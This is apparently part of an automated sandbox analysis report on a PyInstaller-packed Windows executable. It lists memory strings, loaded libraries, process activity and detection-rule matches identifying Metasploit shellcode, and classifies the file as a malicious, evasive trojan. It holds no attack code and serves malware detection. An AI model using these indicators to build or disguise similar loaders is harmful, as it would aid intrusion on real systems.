        Source: DChOtFdp9T.exe, 00000000.00000003.1687322472.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000000.00000003.1683712452.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000000.00000003.1686476688.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000000.00000003.1687253081.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000000.00000003.1696302683.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000000.00000003.1696738812.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000000.00000003.1703601564.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000000.00000003.1696576885.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exeBinary or memory string: OriginalFilename vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1877547774.00007FFE00817000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1879681924.00007FFE101DE000.00000002.00000001.01000000.00000018.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1881143472.00007FFE13208000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_wmi.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1876005974.00007FFDFB1E4000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1881569455.00007FFE132BE000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1872247576.0000017808110000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1880321805.00007FFE11529000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1882310696.00007FFE1A46A000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1880631264.00007FFE120CB000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1877018746.00007FFDFB88E000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1881238198.00007FFE13222000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1879821630.00007FFE1025E000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenamelibsslH vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1879942908.00007FFE1030F000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1880546830.00007FFE11EE3000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1880857160.00007FFE126F4000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1880716057.00007FFE126C6000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1880952298.00007FFE12E16000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs DChOtFdp9T.exe
        Source: DChOtFdp9T.exe, 00000001.00000002.1881044245.00007FFE130C9000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs DChOtFdp9T.exe
        Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.evad.winEXE@4/120@0/1
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029929E0 GetLastError,FormatMessageW,MessageBoxW,0_2_00007FF6029929E0
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4020
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402Jump to behavior
        Source: DChOtFdp9T.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: DChOtFdp9T.exeVirustotal: Detection: 63%
        Source: DChOtFdp9T.exeReversingLabs: Detection: 44%
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile read: C:\Users\user\Desktop\DChOtFdp9T.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\DChOtFdp9T.exe "C:\Users\user\Desktop\DChOtFdp9T.exe"
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeProcess created: C:\Users\user\Desktop\DChOtFdp9T.exe "C:\Users\user\Desktop\DChOtFdp9T.exe"
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4020 -s 1316
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeProcess created: C:\Users\user\Desktop\DChOtFdp9T.exe "C:\Users\user\Desktop\DChOtFdp9T.exe"Jump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: libffi-8.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: libcrypto-3.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: libssl-3.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: libcrypto-3.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: DChOtFdp9T.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: DChOtFdp9T.exeStatic file information: File size 17118166 > 1048576
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: DChOtFdp9T.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: DChOtFdp9T.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687914565.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688219519.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685472622.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
        Source: Binary string: ucrtbase.pdb source: DChOtFdp9T.exe, 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmp
        Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686106421.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
        Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685252137.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
        Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687144003.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687689879.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688330642.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: DChOtFdp9T.exe, 00000001.00000002.1875750642.00007FFDFB0A2000.00000002.00000001.01000000.00000014.sdmp, libcrypto-3.dll.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: DChOtFdp9T.exe, 00000000.00000003.1683174444.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1882140131.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684211779.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, _multiprocessing.pyd.0.dr
        Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685805435.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683307278.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881008984.00007FFE130C5000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140_1.dll.0.dr
        Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687322472.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686910903.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687577629.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: DChOtFdp9T.exe, 00000001.00000002.1881450400.00007FFE132B1000.00000002.00000001.01000000.00000008.sdmp, _ctypes.pyd.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684004628.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1879602509.00007FFE101D7000.00000002.00000001.01000000.00000018.sdmp, _hashlib.pyd.0.dr
        Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685320693.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
        Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686476688.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684844639.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685398039.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683395424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1879894522.00007FFE10308000.00000002.00000001.01000000.00000015.sdmp, _asyncio.pyd.0.dr
        Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687464798.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: DChOtFdp9T.exe, 00000001.00000002.1879766821.00007FFE10252000.00000002.00000001.01000000.00000017.sdmp, pyexpat.pyd.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880770005.00007FFE126EB000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683487752.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881200286.00007FFE1321D000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686660312.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
        Source: Binary string: ucrtbase.pdbUGP source: DChOtFdp9T.exe, 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684440331.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880512904.00007FFE11ED9000.00000002.00000001.01000000.0000000E.sdmp, _socket.pyd.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: DChOtFdp9T.exe, 00000000.00000003.1683307278.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881008984.00007FFE130C5000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140_1.dll.0.dr
        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688752351.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: DChOtFdp9T.exe, 00000001.00000002.1876269235.00007FFDFB5F0000.00000002.00000001.01000000.00000005.sdmp
        Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685695268.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: DChOtFdp9T.exe, 00000000.00000003.1703986094.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmp
        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: DChOtFdp9T.exe, 00000001.00000002.1875750642.00007FFDFB13A000.00000002.00000001.01000000.00000014.sdmp, libcrypto-3.dll.0.dr
